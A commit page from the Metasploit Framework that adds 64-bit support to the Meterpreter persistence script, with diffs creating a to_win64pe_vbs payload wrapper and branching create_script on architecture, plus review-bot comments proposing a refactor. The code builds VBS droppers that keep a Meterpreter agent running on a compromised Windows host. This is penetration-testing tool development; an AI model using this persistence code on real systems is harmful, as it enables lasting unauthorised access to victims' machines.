
Commit ee07809

author
Brent Cook
committed
Land rapid7#5190, 64-bit meterpreter persistence script
2 parents 1d5a054 + e7babc4 commit ee07809


2 files changed

+21
-7
lines changed


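--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1121,6 +1121,10 @@ def self.to_win32pe_vbs(framework, code, opts = {})
 to_exe_vbs(to_win32pe(framework, code, opts), opts)
 end
 
+def self.to_win64pe_vbs(framework, code, opts = {})
+to_exe_vbs(to_win64pe(framework, code, opts), opts)
+end
+
 # Creates a jar file that drops the provided +exe+ into a random file name
 # in the system's temp dir and executes it.
 #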
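Review bot: `to_win64pe_vbs` is added without any comment, while the jar helper just below it in the same hunk carries a header describing what it produces. A one-line header in the same style would be enough, for example `# Builds a 64-bit PE from +code+ with to_win64pe and wraps it with to_exe_vbs; +opts+ is passed to both calls.` The note about `opts` matters because the same hash reaches both helpers, so a key meant for one is also visible to the other.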

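--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -72,13 +72,23 @@ def create_payload(payload_type,lhost,lport)
 
 # Function for Creating persistent script
 #-------------------------------------------------------------------------------
-def create_script(delay,altexe,raw)
-if altexe
-vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
-{:persist => true, :delay => delay, :template => altexe})
+def create_script(delay,altexe,raw,is_x64)
+if is_x64
+if altexe
+vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
+{:persist => true, :delay => delay, :template => altexe})
+else
+vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
+{:persist => true, :delay => delay})
+end
 else
-vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
-{:persist => true, :delay => delay})
+if altexe
+vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
+{:persist => true, :delay => delay, :template => altexe})
+else
+vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
+{:persist => true, :delay => delay})
+end
 end
 print_status("Persistent agent script is #{vbs.length} bytes long")
 return vbs
@@ -224,7 +234,7 @@ def install_as_service(script_on_target)
 print_status("Resource file for cleanup created at #{@clean_up_rc}")
 # Create and Upload Payload
 raw = create_payload(payload_type, rhost, rport)
-script = create_script(delay, altexe, raw)
+script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
 script_on_target = write_script_to_target(target_dir, script)
 
 # Start Multi/Handler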
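Review bot: The new four-way branch in `create_script` repeats the same call and option hash four times, differing only in which builder is called and whether `:template` is set. Building the options once and then choosing the builder keeps the 32-bit and 64-bit paths from drifting apart. Separately, `is_x64` is derived from a substring test on `payload_type` at the call site in the second hunk, and nothing visible checks that a template passed as `altexe` matches that architecture, so a mismatch would presumably only surface on the target. The closing `end` of `create_script` lies outside the hunk.

```ruby
def create_script(delay,altexe,raw,is_x64)
  opts = {:persist => true, :delay => delay}
  opts[:template] = altexe if altexe
  vbs = if is_x64
    ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw, opts)
  else
    ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw, opts)
  end
  # … unchanged: print_status and return vbs …
```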
